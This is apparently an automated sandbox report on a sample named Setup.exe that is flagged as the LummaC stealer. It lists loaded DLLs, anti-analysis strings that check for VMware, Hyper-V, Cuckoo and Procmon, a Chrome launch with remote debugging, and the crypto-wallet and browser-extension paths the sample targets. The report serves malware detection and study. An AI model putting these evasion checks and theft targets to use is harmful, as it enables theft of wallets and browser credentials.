        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: ????? .dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
        Source: Malware.zipStatic file information: File size 56892136 > 1048576
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: Setup.exe, 0000000A.00000002.2479161543.0000000000E23000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: PROCMON.EXE
        Source: Setup.exe, 0000000A.00000002.2479068610.0000000000E21000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: QVERROR MESSAGEERROR NOT SUPPORT SYSTEMMPVMP32ENTRYKERNEL32.DLLERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMVMTOOLSD.EXECUCKOO_SVC.EXEXENSERVICE.EXEPROCMON.EXE
        Source: Setup.exeBinary or memory string: ,E,,EERROR MESSAGEERROR NOT SUPPORT SYSTEMMPVMP32ENTRYKERNEL32.DLLERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMVMTOOLSD.EXECUCKOO_SVC.EXEXENSERVICE.EXEPROCMON.EXE
        Source: Setup.exe, 0000000A.00000002.2479161543.0000000000E23000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: XENSERVICE.EXE
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe TID: 6804Thread sleep time: -90000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: chrome.exe, 0000000D.00000002.2609788431.0000691401688000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C34F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
        Source: chrome.exe, 0000000D.00000003.1929517945.000001B00C3E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: B Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
        Source: Setup.exe, 0000000A.00000003.1828376706.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000002.2483621904.000000000139D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Setup.exe, 0000000A.00000002.2479068610.0000000000E21000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: QvError messageError not support systemMpVmp32Entrykernel32.dllError messageError not support systemError messageError not support systemError messageError not support systemvmtoolsd.execuckoo_svc.exexenservice.exeprocmon.exe
        Source: Setup.exe, 0000000A.00000003.1828376706.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000002.2483621904.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipesy5I
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical ProcessoruiT
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
        Source: chrome.exe, 0000000D.00000003.1921929489.000001B00C3AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cation Bytes Read From Cache9542Application Bytes Read From Server9544Application Bytes Read From Server (Not Cached)3260Teredo Relay3262In - Teredo Relay Total Packets: Success + Error3264In - Teredo Relay Success Packets: Total3266In - Teredo Relay Success Packets: Bubbles3268In - Teredo Relay Success Packets: Data Packets3270In - Teredo Relay Error Packets: Total3272In - Teredo Relay Error Packets: Header Error3274In - Teredo Relay Error Packets: Source Error3276In - Teredo Relay Error Packets: Destination Error3278Out - Teredo Relay Total Packets: Success + Error3280Out - Teredo Relay Success Packets3282Out - Teredo Relay Success Packets: Bubbles3284Out - Teredo Relay Success Packets: Data Packets3286Out - Teredo Relay Error Packets3288Out - Teredo Relay Error Packets: Header Error3290Out - Teredo Relay Error Packets: Source Error3292Out - Teredo Relay Error Packets: Destination Error3294In - Teredo Relay Total Packets: Success + Error / sec3296Out - Teredo Relay Total Packets: Success + Error / sec3298In - Teredo Relay Success Packets: Data Packets User Mode3300In - Teredo Relay Success Packets: Data Packets Kernel Mode3302Out - Teredo Relay Success Packets: Data Packets User Mode3304Out - Teredo Relay Success Packets: Data Packets Kernel Mode3306IPHTTPS Session3308Packets received on this session3310Packets sent on this session3312Bytes received on this session3314Bytes sent on this session3316Errors - Transmit errors on this session3318Errors - Receive errors on this session3320Duration - Duration of the session (Seconds)3344DNS64 Global3346AAAA queries - Successful3348AAAA queries - Failed3350IP6.ARPA queries - Matched3352Other queries - Successful3354Other queries - Failed3356AAAA - Synthesized records3322IPHTTPS Global3324In - Total bytes received3326Out - Total bytes sent3328Drops - Neighbor resolution timeouts3330Errors - Authentication Errors3332Out - Total bytes forwarded3334Errors - Transmit errors on the server3336Errors - Receive errors on the server3338In - Total packets received3340Out - Total packets sent3342Sessions - Total sessions3230Teredo Server3232In - Teredo Server Total Packets: Success + Error3234In - Teredo Server Success Packets: Total3236In - Teredo Server Success Packets: Bubbles3238In - Teredo Server Success Packets: Echo3240In - Teredo Server Success Packets: RS-Primary3242In - Teredo Server Success Packets: RS-Secondary3244In - Teredo Server Error Packets: Total3246In - Teredo Server Error Packets: Header Error3248In - Teredo Server Error Packets: Source Error3250In - Teredo Server Error Packets: Destination Error3252In - Teredo Server Error Packets: Authentication Error3254Out - Teredo Server: RA-Primary3256Out - Teredo Server: RA-Secondary 3258In - Teredo Server Total Packets: Success + Error / sec3206Teredo Client3208In - Teredo Router Advertisement3210In - Teredo Bubble3212In - Teredo Data3214In - Teredo Invalid3216Out - Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo D
        Source: chrome.exe, 0000000D.00000002.2597706000.00006914010DC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware20,1
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processord
        Source: chrome.exe, 0000000D.00000003.1922371603.000001B00C3DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MANIFEST-000001 Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time48
        Source: chrome.exe, 0000000D.00000003.1922189600.000001B00C3AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Mon
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus PipesS47
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesl{vi
        Source: chrome.exe, 0000000D.00000003.1921929489.000001B00C3AF000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929517945.000001B00C3F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Se
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll
        Source: chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitionl
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
        Source: LoaderContent.swfBinary or memory string: vMCi&
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionesuWI
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V slexqmlaukdusbe Bus Pipes
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V slexqmlaukdusbe Bus
        Source: chrome.exe, 0000000D.00000003.1889284406.00006914003D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware20,1(
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
        Source: Setup.exe, 0000000A.00000002.2479161543.0000000000E23000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: vmtoolsd.exeJ9[
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionun
        Source: chrome.exe, 0000000D.00000002.2489825006.000001B005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes>y,
        Source: Setup.exeBinary or memory string: ,e,,eError messageError not support systemMpVmp32Entrykernel32.dllError messageError not support systemError messageError not support systemError messageError not support systemvmtoolsd.execuckoo_svc.exexenservice.exeprocmon.exe
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual ProcessorgXZ
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root PartitionO5;
        Source: chrome.exe, 0000000D.00000002.2599149994.0000691401178000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=63552d2a-7c81-44f6-a4b2-fe8b4fcdee48
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual ProcessoreKV
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service?
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorui
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorc.sys!X
        Source: chrome.exe, 0000000D.00000002.2621929269.00007FFFE5441000.00000020.00000001.01000000.0000000A.sdmpBinary or memory string: xVMcI
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2535300930.000001B008D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223Jump to behavior
        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Setup.exe, 0000000A.00000002.2479161543.0000000000E23000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: procmon.exe

        Stealing of Sensitive Information

        barindex
        Yara detected LummaC Stealer
        Source: Yara matchFile source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Found many strings related to Crypto-Wallets (likely being stolen)
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: s","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs`
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet},{"en":"nanjmdknhkinifnkgdcggcfnhdaammmj","ez":"Guild"},{"en":"nkddgncdjgjfcddamfgcmfnlhccnimig","ez":"SaZ
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
        Source: Setup.exe, 0000000A.00000002.2483621904.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
        Source: Setup.exe, 0000000A.00000002.2483621904.000000000139D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003CA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live^
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
